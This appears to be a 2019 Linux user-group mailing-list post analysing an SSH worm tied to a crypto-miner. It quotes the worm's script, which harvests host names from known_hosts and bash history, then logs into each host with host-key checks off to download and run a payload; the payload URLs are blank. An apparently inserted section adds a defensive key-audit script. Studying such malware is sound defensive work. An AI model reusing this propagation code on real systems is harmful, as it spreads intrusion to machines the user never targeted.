[kwlug-disc] SSH hygiene suggestion

tomg at sentex.ca tomg at sentex.ca
Thu Jan 10 03:10:51 EST 2019


Dear KWLUG,

This is in response to these articles:
https://www.zdnet.com/article/new-linux-crypto-miner-steals-your-root-password-and-disables-your-antivirus/
https://www.itwire.com/security/85406-linux-malware-of-no-use-unless-it-gains-access-through-ssh.html
https://vms.drweb.com/virus/?i=17645163

I think the ZDNet article is lying when it says by omission that
malware on Linux is getting as bad as Windows, but that's not why I'm
here.  What I mean is, I think it is also lying when it says that it
spreads mostly via SSH, or even that it is indeed a worm.  "This SSH
self-spreading mechanism is believed to be the trojan's main distribution channel."

I have to go by second-hand reporting, but this malware will grep your
/root/.ssh/known_hosts and ~/.bash_history files for remote hosts and then
attempt to spread in them.  Here is the relevant (badly written) program:

cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h
cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h
cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h
cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h
cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h
cat /tmp/.h|grep -v 127.0.0.1|grep -v localhost|sort -u > /tmp/.hh
cat /tmp/.hh > /tmp/.h
rm -rf /tmp/.hh
for i in `cat /tmp/.h`
do
     (
         exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget -c -O /tmp/ ;curl -o /tmp/ ;python -c \"import urllib;urllib.urlretrieve(\\\"\\\", \\\"/tmp/\\\")\";php -r '\$f=fopen(\"'/tmp/'\",\"w\");fwrite(\$f, implode(\"\", @file(\"''\")));fclose(\$f);';ruby -e \"require 'open-uri';File.open('/tmp/', 'w') {|f| f.write(open('') {|f1| f1.read})}\";perl -MNet::FTP -e \"\\\$ftp = Net::FTP->new(\\\"\\\");\\\$ftp->login('', '');\\\$ftp->binary;\\\$ftp->get(\\\"\\\",\\\"/tmp/\\\")\";chmod 755 /tmp/;(exec /tmp/ &> /dev/null &)" &> /dev/null &
     )
done

Thanks to Khalid Baheyeldin I know what AWK is doing and I understand
everything in the top half of that script.

The second half doesn't work at all. Despite using five tools to download
something it never specifies anything to download.  I have no idea why it's
there.  Is it a red herring, a distraction?

If it did specify something to download it wouldn't work because it tries to
download to /tmp/ as a file.  The author might know this if he didn't redirect
all output to /dev/null, but I guess that's one of the downsides of crime, you
can't get debugging output.

There are other problems with the script which make it less effective but this
mailing list is publicly-accessible and I don't want to debug it for the
criminal.

However, this worm or another like it *might* be written right one day, so I
have a suggestion.

It looks like this SSH worm can only spread if a) the use of authorized_keys
is in place and b) the private SSH key is not password-encrypted.  So, my
suggestion is, to the Linux world, please encrypt your private SSH key.  It
may also be a good idea not to run SSH servers on systems from which you also
run SSH clients, or maybe any servers on a client computer and vice versa.
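As an added example (not code from the original post, and not anything the articles or Dr. Web published), here is a read-only audit a defender can run against their own ~/.ssh to check the two conditions the suggestion above rests on: whether any private key there is stored without a passphrase, and whether known_hosts still lists hosts in clear text, which is exactly what the first half of the harvesting script greps for. It assumes a POSIX sh with grep, sed, awk, tr, base64 and head/tail; the file names in the usage and the sample key headers used to exercise it are constructed, and the key check reads only the cipher name in the openssh-key-v1 header (or the PEM Proc-Type/ENCRYPTED banners), never key material.

```shell
#!/bin/sh
# Added example, not code from the original post: a read-only hygiene audit
# of an SSH client directory. It reports (1) private keys stored without a
# passphrase and (2) known_hosts entries kept in clear text, the two things
# the harvesting script above relies on. Assumes POSIX sh with grep, sed,
# awk, tr, base64 and head/tail (GNU or BSD). Nothing here modifies files.

# key_is_encrypted FILE
# Exit status: 0 = passphrase-protected, 1 = NOT protected, 2 = not a private key.
key_is_encrypted() {
    key="$1"
    [ -r "$key" ] && grep -q -- '-----BEGIN .*PRIVATE KEY-----' "$key" || return 2

    if grep -q -- '-----BEGIN OPENSSH PRIVATE KEY-----' "$key"; then
        # OpenSSH's native format (openssh-key-v1) stores the cipher name as a
        # length-prefixed string right after the 15-byte magic, so bytes 20-23
        # of the decoded blob read "none" when the key has no passphrase.
        cipher=$(sed -n '/^-----BEGIN OPENSSH/,/^-----END OPENSSH/p' "$key" \
                 | grep -v -- '-----' | tr -d '\n\r' \
                 | base64 -d 2>/dev/null | head -c 23 | tail -c 4)
        [ "$cipher" = "none" ] && return 1
        return 0
    fi

    # Legacy PEM keys announce encryption with a Proc-Type header (PKCS#1) or
    # an ENCRYPTED PRIVATE KEY banner (PKCS#8); without either they are plaintext.
    grep -q 'Proc-Type: 4,ENCRYPTED' "$key" && return 0
    grep -q -- '-----BEGIN ENCRYPTED PRIVATE KEY-----' "$key" && return 0
    return 1
}

# unencrypted_keys DIR
# Prints the path of every private key in DIR that is not passphrase-protected.
unencrypted_keys() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        status=0
        key_is_encrypted "$f" || status=$?
        [ "$status" -eq 1 ] && echo "$f"
    done
    return 0
}

# known_hosts_clear_count FILE
# Prints how many entries in FILE name a host in clear text rather than as a
# "|1|<salt>|<hash>" entry, the form OpenSSH writes when HashKnownHosts is on.
known_hosts_clear_count() {
    [ -r "$1" ] || { echo 0; return; }
    awk '
        /^[[:space:]]*(#|$)/ { next }            # comments and blank lines
        { host = ($1 ~ /^@/) ? $2 : $1 }         # skip @cert-authority/@revoked markers
        host !~ /^\|1\|/ { n++ }
        END { print n + 0 }
    ' "$1"
}

# audit_ssh_dir DIR: human-readable report with the OpenSSH commands that fix each finding.
audit_ssh_dir() {
    dir="$1"
    echo "== SSH client hygiene audit of $dir =="
    unencrypted_keys "$dir" | while read -r k; do
        echo "WARNING: $k has no passphrase; add one with: ssh-keygen -p -f \"$k\""
    done
    nclear=$(known_hosts_clear_count "$dir/known_hosts")
    if [ "$nclear" -gt 0 ]; then
        echo "WARNING: $nclear clear-text host entries in $dir/known_hosts;"
        echo "         hash them with: ssh-keygen -H -f \"$dir/known_hosts\""
        echo "         and set 'HashKnownHosts yes' in ~/.ssh/config for new entries"
    fi
    return 0
}

# Usage: sh ssh_audit.sh [DIR]   (defaults to ~/.ssh)
audit_ssh_dir "${1:-$HOME/.ssh}"
```

Two caveats worth keeping in mind when reading the report. Hashing known_hosts only removes one of the sources the script mines; the same script also pulls addresses and `ssh user@host` arguments out of ~/.bash_history, which no ssh_config option hides. And a passphrase only helps while the key is locked: a key that has been loaded into a running ssh-agent (or reached through agent forwarding) can be used by any process running as that user without the passphrase ever being typed again.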

I would also like to know why Dr. Web is not publishing the source code to
this virus.  My and others' security are concerned and this bugs me.  Is it
necessary and if so, why?  And can I get it as a concerned Linux user or do I
have to provide some information that I'm a serious security researcher?

...

"cat /tmp/.hh > /tmp/.h ; rm -rf /tmp/.hh" ?  He knows about AWK but not mv?

Tom
